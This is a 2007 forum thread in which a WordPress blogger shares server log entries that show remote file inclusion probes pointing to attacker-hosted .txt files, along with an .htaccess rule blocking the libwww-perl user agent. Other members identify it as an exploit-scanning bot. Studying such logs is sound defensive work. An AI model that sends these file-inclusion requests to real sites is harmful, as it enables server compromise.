Weird HTTP Requests in Server Logs
I have had some weird requests on my blog. I use Wordpress with Quick Stats that gives me some simple traffic information. Here are a few that raise some flags.
URL: /port.php?content=http://www.ilegais.110mb.com/ilg.txt?
Date: 2007-Oct-01 20:12:46
Referer:
IP: 85.214.59.8
Host: xtommmik.com
Browser: libwww-perl/5.803
URL: /index.php?topic=http://www.ilegais.110mb.com/did.txt?
Date: 2007-Oct-01 19:34:03
Referer:
IP: 87.106.179.35
Host: idlp-hosting.de
Browser: libwww-perl/5.805
URL: /index.php?var=http://www.ilegais.110mb.com/ilg.txt?
Date: 2007-Oct-01 16:37:33
Referer:
IP: 85.214.59.8
Host: xtommmik.com
Browser: libwww-perl/5.803Until I figure out what these requests are about, I am blocking all requests with this user agent by putting this in my .htaccess file:
RewriteCond %{HTTP_USER_AGENT} (libwww-perl) [NC]
RewriteRule .* - [F]I'm assuming that somebody is up to no good, but does anybody know what this is? I tried loading these files in the HTTP request, but they don't exist anymore.
I saw similar requests on a different site I did several months ago (totally from scratch with no existing CMS), so I don't think this is related to Wordpress.
Busy posted this at 09:51 — 2nd October 2007.
He has: 6,151 posts
Joined: May 2001
if you go to ilegais.110mb.com it shows not found
blocking libwww-perl is blocking a lot of people/bots, you'd be better off blocking the IP's but would still be blocking a few
if you get these, report the site to the host, in this case would be 110mb.com
pr0gr4mm3r posted this at 16:34 — 2nd October 2007.
He has: 1,502 posts
Joined: Sep 2006
Do you have any examples? I checked my logs before I did this, and I did not find any other instance of this user agent...in bots or regular visits.
JeevesBond posted this at 19:41 — 2nd October 2007.
He has: 3,956 posts
Joined: Jun 2002
I'm sure libwww-perl would be quite widely used, it's a Perl library. Although if you haven't seen any other instance of it in your logs then it probably wont hurt to block it (just remember that in a few years time when a bot is trying to crawl your site or something!)
That looks like a bot designed to use a security exploit in some application. Maybe a cross-site scripting vulnerability, or perhaps whatever file is passed to the 'content' variable is eval()'d. You've probably not got the software installed, but that wont stop the bot from trying. It's probably trawling a number of sites.
a Padded Cell our articles site!
greg posted this at 00:23 — 3rd October 2007.
He has: 1,581 posts
Joined: Nov 2005
Do you have people able to post links on your site?
if so then it may just have been someone providing a link to their site as 110mb is free hosting site
and the "ilegais" is obviously the standard freebie subdomain given by 110mb
as the site has been removed foul play may have been happening,
but not much can be done from a link meerly to a .txt file
send 110mb an email and ask if the site was removed from their servers for dodgy activity
pr0gr4mm3r posted this at 00:47 — 3rd October 2007.
He has: 1,502 posts
Joined: Sep 2006
I actually just got another hit, this one pointing to http://71.102.93.10/WTS/bin/hak/idpitbull.txt. The code doesn't look to do anything harmful in itself. It seems to output some information of the server that it's on. Don't know what that information can be used for, but I'm pretty sure it's not anything good.
greg posted this at 01:33 — 3rd October 2007.
He has: 1,581 posts
Joined: Nov 2005
Ouch
I'm doing some more digging but it certainly looks like a hack code
http://www.yugatech.com/blog/the-internet/hack-attack-in-progress/
search google for - echo "mic22" - it might come to nothing, but I suppose it depends on your site set up
you should do a full read of all your server logs
pr0gr4mm3r posted this at 13:40 — 3rd October 2007.
He has: 1,502 posts
Joined: Sep 2006
Ya, it doesn't look like anything good. I'm going to leave that htaccess code in my file and keep them out. Any bots should have official user agents anyway.
Want to join the discussion? Create an account or log in if you already have one. Joining is fast, free and painless! We’ll even whisk you back here when you’ve finished.